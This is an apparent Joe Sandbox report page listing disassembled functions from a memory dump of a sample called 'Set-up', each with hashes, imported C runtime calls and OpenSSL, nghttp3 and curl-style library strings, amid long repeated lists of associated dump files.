Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 69302390da753804859d99de631880d1890d787ee3343a0735a68bb249e123a6
Instruction ID: f8f5e5495051c57fe167175cb2ed3720af26952879155d6f43fe559cac4b8d0f
Opcode Fuzzy Hash: 69302390da753804859d99de631880d1890d787ee3343a0735a68bb249e123a6
Instruction Fuzzy Hash: 8541B3B1A083519BE70C9F69A880B2F77E9AF96A5CF0A443CE84DC7255E774DC04C792

Function 00F767F0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 117stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00F7691C

Strings

error:%08lX:%s:%s:%s, xrefs: 00F768FE
err:%lx:%lx:%lx:%lx, xrefs: 00F76933
reason(%lu), xrefs: 00F768E1
lib(%lu), xrefs: 00F7689A

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen
String ID: err:%lx:%lx:%lx:%lx$error:%08lX:%s:%s:%s$lib(%lu)$reason(%lu)
API String ID: 39653677-804487489
Opcode ID: 63a1087fa92993ec862e357e684ceb0ca88ac84df04cedef368acbed9e655635
Instruction ID: a35ee13eb45b15392a578d9bc6f36edc1fa82223973cc390a2cd01517ec36150
Opcode Fuzzy Hash: 63a1087fa92993ec862e357e684ceb0ca88ac84df04cedef368acbed9e655635
Instruction Fuzzy Hash: 9A3109B2E0870067F7206A559C42FAB769C9F90714F15443DFD4C92292F775AD14E2A3

Function 0110A340 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 106stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,0110ABB9), ref: 0110A34E

Part of subcall function 00F9E270: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 00F9E28D

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,0110ABB9), ref: 0110A446

Strings

crypto/conf/conf_def.c, xrefs: 0110A3B9, 0110A410
.conf, xrefs: 0110A376
.cnf, xrefs: 0110A38E

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen$_errno
String ID: .cnf$.conf$crypto/conf/conf_def.c
API String ID: 3066963124-3060939390
Opcode ID: 381097a074430071119301f97d2fc5af67adbc9f0fd41c2792cb0ff4cf5e48a8
Instruction ID: 2a1c5ddbff1692f221fd690e25baf98342918a81d54393230fb79c32f1270fed
Opcode Fuzzy Hash: 381097a074430071119301f97d2fc5af67adbc9f0fd41c2792cb0ff4cf5e48a8
Instruction Fuzzy Hash: E02139B2D04302A7FA197675BC82E1F3B9C8F62608F490839F945D7282F7B9D9148163

Function 011466C0 Relevance: 7.6, APIs: 5, Instructions: 100stringCOMMON

Download Yara Rule

APIs

Part of subcall function 01147850: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,011466E9,?,?,?,?,?,?,?,?,?,?,?), ref: 0114787B

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,UTF-8,00000001,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 011466F5
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,014D11AC,?,?,00000001,00000000,00000000,?,00000009,?), ref: 01146714
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 01146727
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 01146776
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 011467CC

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _errno$strcmp
String ID:
API String ID: 3909137471-0
Opcode ID: 29759fb7571c1fe63ab3d9a5458a7c983c1016c5db9afcbd8de1ad1b68d3ca01
Instruction ID: 38a55b2252b497b4c9bdd9b08dc4c1210b77ff3963546c5c597ebd029078ca53
Opcode Fuzzy Hash: 29759fb7571c1fe63ab3d9a5458a7c983c1016c5db9afcbd8de1ad1b68d3ca01
Instruction Fuzzy Hash: A9310131A007059FDB29AFA8DC40A1A77E9AF4A62DF040538FE9897312F331E910CB91

Function 00FA2010 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00FA2704,00000008), ref: 00FA204D

Part of subcall function 00F77220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F77262
Part of subcall function 00F77220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F77285
Part of subcall function 00F77220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F772C5
Part of subcall function 00F77220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F772E8

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,00FA2704,00000008), ref: 00FA20C3

Strings

copy_integer, xrefs: 00FA20DA
crypto/params.c, xrefs: 00FA2090, 00FA20E4
general_set_int, xrefs: 00FA2086

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcpymemset
String ID: copy_integer$crypto/params.c$general_set_int
API String ID: 2323844366-2562949257
Opcode ID: 78257d5470b6043b10886d2817fac1ea92ee11b076503a1c4475ec48d76c3c5e
Instruction ID: 7704b1947c36ba75323c2e7b9d97e5ea05b247e147f534e81cd92ea07517ca41
Opcode Fuzzy Hash: 78257d5470b6043b10886d2817fac1ea92ee11b076503a1c4475ec48d76c3c5e
Instruction Fuzzy Hash: C721FBF1F483006BD270762CAC82F377795DB86714F24C03AF91D86243E6A6AC45F2A2

Function 00FA2140 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00FA299E,00000008), ref: 00FA21A8
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00FA299E,00000008), ref: 00FA21FE

Part of subcall function 00FA40A0: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00FA2075,?,?,?,?,?,?,00FA2704,00000008), ref: 00FA40C1
Part of subcall function 00FA40A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00FA2075,?,?,?,?,?,?,00FA2704,00000008), ref: 00FA411E

Strings

copy_integer, xrefs: 00FA2214
crypto/params.c, xrefs: 00FA2180, 00FA21C4, 00FA221E
general_get_uint, xrefs: 00FA2176, 00FA21BA

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: copy_integer$crypto/params.c$general_get_uint
API String ID: 1297977491-1187682564
Opcode ID: 1cfcabd5af4c3f97a3f3f709e588a0396b8694fe7a19420d76f3c2733820039d
Instruction ID: 464a0182272b3f096f0b3223448c22d832d851c77ca7be0939fad47f4a86be94
Opcode Fuzzy Hash: 1cfcabd5af4c3f97a3f3f709e588a0396b8694fe7a19420d76f3c2733820039d
Instruction Fuzzy Hash: EA21A8B6F9430077D564316CAC43F2F77468BD6B28F28402BF60CAA183FAA5AC5171A1

Function 00FA2240 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,00FA2BF4,00000008), ref: 00FA22C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,00FA2BF4,00000008), ref: 00FA2312

Strings

copy_integer, xrefs: 00FA228B
general_set_uint, xrefs: 00FA22D2
crypto/params.c, xrefs: 00FA2295, 00FA22DC

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: copy_integer$crypto/params.c$general_set_uint
API String ID: 1297977491-3191580373
Opcode ID: 1963f5dbaa12a59ed6a2f594b3e7393a35fed67f9eb295b488b9b959aab5ae0c
Instruction ID: f1d26f99048feb75192cba99e93d5a3a9087012ebe87448c64335ea1487f7f86
Opcode Fuzzy Hash: 1963f5dbaa12a59ed6a2f594b3e7393a35fed67f9eb295b488b9b959aab5ae0c
Instruction Fuzzy Hash: 7F21FFF1F583006BEF74766C9C81F3A77C99797724F24442EF44996183E5A5EC406261

Function 00FA40A0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00FA2075,?,?,?,?,?,?,00FA2704,00000008), ref: 00FA40C1

Part of subcall function 00F77220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F77262
Part of subcall function 00F77220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F77285
Part of subcall function 00F77220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F772C5
Part of subcall function 00F77220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F772E8

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00FA2075,?,?,?,?,?,?,00FA2704,00000008), ref: 00FA411E

Strings

copy_integer, xrefs: 00FA4134
unsigned_from_signed, xrefs: 00FA40D3
crypto/params.c, xrefs: 00FA40DD, 00FA413E

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcpymemset
String ID: copy_integer$crypto/params.c$unsigned_from_signed
API String ID: 2323844366-3781254518
Opcode ID: 38f3dfbbb2af79e139fcd2a300fc7214d5e87f395164938c63f7119023da0ee7
Instruction ID: 8e86e237663dd3d29f36420953588545a89a6c004dba2b25ae5493e3de2e08bb
Opcode Fuzzy Hash: 38f3dfbbb2af79e139fcd2a300fc7214d5e87f395164938c63f7119023da0ee7
Instruction Fuzzy Hash: 4901F9F1B9831136D23172696C47F2B37448FD2B25F24443AF60CA61C3F2E9B844A2A2

Function 00E108D0 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 274COMMON

Download Yara Rule

Strings

, xrefs: 00E1048E
rwx-tTsS, xrefs: 00E10391

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID: $rwx-tTsS
API String ID: 0-331890564
Opcode ID: ed6f29038d106d0a3028184df31a3333b71901a2c510e49713e05a4e326a5456
Instruction ID: 27b84e81787595d10c9d38ade6bc1efa00432006721de5859ea085bef3561787
Opcode Fuzzy Hash: ed6f29038d106d0a3028184df31a3333b71901a2c510e49713e05a4e326a5456
Instruction Fuzzy Hash: DCB19A705087418FE738CF14C0A07BBB7E2EF55718F14A90DE19666A92D3B5E8C6CB92

Function 00E6E600 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(013C811C,nghttp3_qpack.c,00000811,?,?), ref: 00E6E866
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(space <= ctx->max_dtable_capacity,nghttp3_qpack.c,0000080D,?,?,?,?,?,00E7077F,?,?,00000000,00000000), ref: 00E6E87B

Strings

nghttp3_qpack.c, xrefs: 00E6E85C, 00E6E871
space <= ctx->max_dtable_capacity, xrefs: 00E6E876

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_qpack.c$space <= ctx->max_dtable_capacity
API String ID: 1222420520-1270044496
Opcode ID: fc38b3bba3761019047d263c523afa540e0974e383868084c4cf2aee33fd81e0
Instruction ID: d0ac8cd32a35a3606e088a0a56e8b06ee6bd091a267b8710b2805b94529af954
Opcode Fuzzy Hash: fc38b3bba3761019047d263c523afa540e0974e383868084c4cf2aee33fd81e0
Instruction Fuzzy Hash: AE81E679A406019FD710DF24EC42A26B7F1FF44398F08562CE84AA7752EB31F965CB91

Function 00E78350 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180stringCOMMON

Download Yara Rule

APIs

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 00E783AD
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(HOSTALIASES), ref: 00E783C5

Part of subcall function 00E877B0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,013CEBCD,00000000,00000000,?,?,?,00E89882,?,00000000), ref: 00E877DD
Part of subcall function 00E877B0: fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 00E877F0
Part of subcall function 00E877B0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 00E87802

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00E7853F

Strings

HOSTALIASES, xrefs: 00E783C0

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _stricmpfclosefopenfseekgetenvstrchr
String ID: HOSTALIASES
API String ID: 1675145106-255135673
Opcode ID: 73a05b7aea7f78bdb0910c15f71be8d325f39ec9d98c863f27a3b1fb7cdcaf20
Instruction ID: 888a27942bdfc9308755ec84814aa4438d4e75e800ca88de03db2f1475c5538a
Opcode Fuzzy Hash: 73a05b7aea7f78bdb0910c15f71be8d325f39ec9d98c863f27a3b1fb7cdcaf20
Instruction Fuzzy Hash: 1851C4A2D0838257E720EB209D417AB72E85FF5308F00E92DFD8DA1152FBB5D6948B52

Function 00DC81B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150stringCOMMON

Download Yara Rule

APIs

_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00DC54E6), ref: 00DC8235
strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002F), ref: 00DC82D4
strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005C), ref: 00DC82E1

Strings

mime.c, xrefs: 00DC824C, 00DC82B8, 00DC832D, 00DC8342, 00DC835E, 00DC837A, 00DC839C

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
